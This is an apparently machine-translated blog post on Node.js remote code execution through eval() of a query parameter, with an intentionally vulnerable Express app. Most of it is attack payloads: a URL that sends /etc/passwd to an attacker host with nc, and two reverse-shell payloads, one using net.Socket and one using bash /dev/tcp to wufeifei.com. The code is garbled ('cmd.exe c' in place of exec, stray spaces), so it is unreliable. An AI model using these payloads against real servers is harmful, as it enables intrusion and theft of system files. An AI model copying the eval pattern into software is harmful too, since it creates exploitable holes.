NodeJS remote code execution, nodejs
Background
@ Artsploit: When digging for a PayPal vulnerability, a node. js code execution is found, and the reward is $10000 USD.
Test
Var express = require ('express '); var app = express (); app. get ('/', function (req, res) {res. send ('Hello eval (req. query. q); console. log (req. query. q) ;}); app. listen (8080, function () {console. log ('example listening on port 8080! ');});
Arbitrary File Reading
Http: // host: 8080 /? Q1_require('child_process'cmd.exe c ('cat +/etc/passwd + | + nc + attackerip + 80 ')
GET SHELL
Http: // host: 8080 /? Q = var + net + = + require ("net"), + sh + = + require ("child_process" cmd.exe c ("/bin/bash "); var + client ++ new + net. socket (); client. connect (80, + "attackerip", + function () {client. pipe (sh. stdin); sh. stdout. pipe (client); sh. stderr. pipe (client );});
GET SHELL2
Http: // host: 8080 /? Q = require ("child_process" cmd.exe c ('bash-c "bash-I> % 26/dev/tcp/wufeifei.com/7890 0> % 261 "')